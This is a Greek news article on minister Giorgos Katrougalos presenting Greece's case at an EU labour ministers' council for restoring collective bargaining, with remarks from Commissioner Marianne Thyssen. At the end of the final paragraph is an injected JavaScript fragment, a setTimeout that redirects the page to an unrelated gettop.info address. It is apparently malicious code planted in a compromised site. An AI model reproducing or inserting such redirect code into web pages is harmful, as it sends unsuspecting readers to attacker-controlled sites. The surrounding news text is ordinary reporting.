Η εθνική θέση για επαναφορά συλλογικών διαπραγματεύσεων από τον Γ. Κατρούγκαλο

0
4

 

Στο Συμβούλιο υπουργών Εργασίας ο υπουργός Γιώργος Κατρούγκαλος παρουσίασε την εθνική θέση για την επαναφορά των συλλογικών διαπραγματεύσεων, ως θέμα σεβασμού της νομιμότητας και του ευρωπαϊκού κοινωνικού μοντέλου.

Σε σχετική ανακοίνωση του υπουργείου αναφέρεται πως για πρώτη φορά, έπειτα από αίτημα της χώρας μας, συζητήθηκαν σε συμβούλιο υπουργών Εργασίας (και όχι, ως συνήθως, στο Eurogroup), μεταρρυθμίσεις της αγοράς εργασίας, χώρας που είναι σε πρόγραμμα προσαρμογής.

Ο κ. Κατρούγκαλος αναφέρθηκε στη νομολογία της Ευρωπαϊκής Επιτροπής Κοινωνικών Δικαιωμάτων, που θεωρεί υφιστάμενες μνημονιακές ρυθμίσεις αντίθετες προς τον Ευρωπαϊκό Κοινωνικό Χάρτη του Συμβουλίου της Ευρώπης, με κατ’ εξοχήν παράδειγμα τον υπο- κατώτατο μισθό των νέων. «Αξιοσημείωτο», όπως επισημαίνεται στην ανακοίνωση, «είναι ότι και το Δικαστήριο της Ευρωπαϊκής Ένωσης ανέτρεψε προηγούμενη νομολογία του στην πρόσφατη απόφαση του «Λήδρα» και θεωρεί πλέον ότι τα προγράμματα προσαρμογής πρέπει να σέβονται το Ευρωπαϊκό Δίκαιο και το Χάρτη των Θεμελιωδών Δικαιωμάτων.

Πάνω από όλα, όμως, οι επικείμενες διαπραγματεύσεις, ακριβώς επειδή έχουν συνδεθεί με την εφαρμογή των «ευρωπαϊκών καλών πρακτικών», αφορούν όλες τις ευρωπαϊκές χώρες και την υπεράσπιση του Ευρωπαϊκού Κοινωνικού Μοντέλου. Στο πλαίσιο αυτό, η ελληνική κυβέρνηση θεωρεί ότι η χώρα μας πρέπει να επιστρέψει στην ευρωπαϊκή κανονικότητα, με την επιστροφή των συλλογικών διαπραγματεύσεων, την αναστροφή της γενικευμένης απορρύθμισης και την πλήρη υπεράσπιση των δικαιωμάτων των εργαζομένων. Όλες οι χώρες που τοποθετήθηκαν επί του θέματος, υποστήριξαν τις ελληνικές θέσεις για την ανάγκη ενίσχυσης του κοινωνικού διαλόγου και υπεράσπισης του Ευρωπαϊκού Κοινωνικού Μοντέλου».

Η Επίτροπος Μαριάν Τάισεν αναφέρθηκε στο πόρισμα της Επιτροπής των Ανεξάρτητων Ειδικών ως μία καλή αρχή για τη διαπραγμάτευση και επιβεβαίωσε την προσήλωση της Επιτροπής στον κοινωνικό διάλογο. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here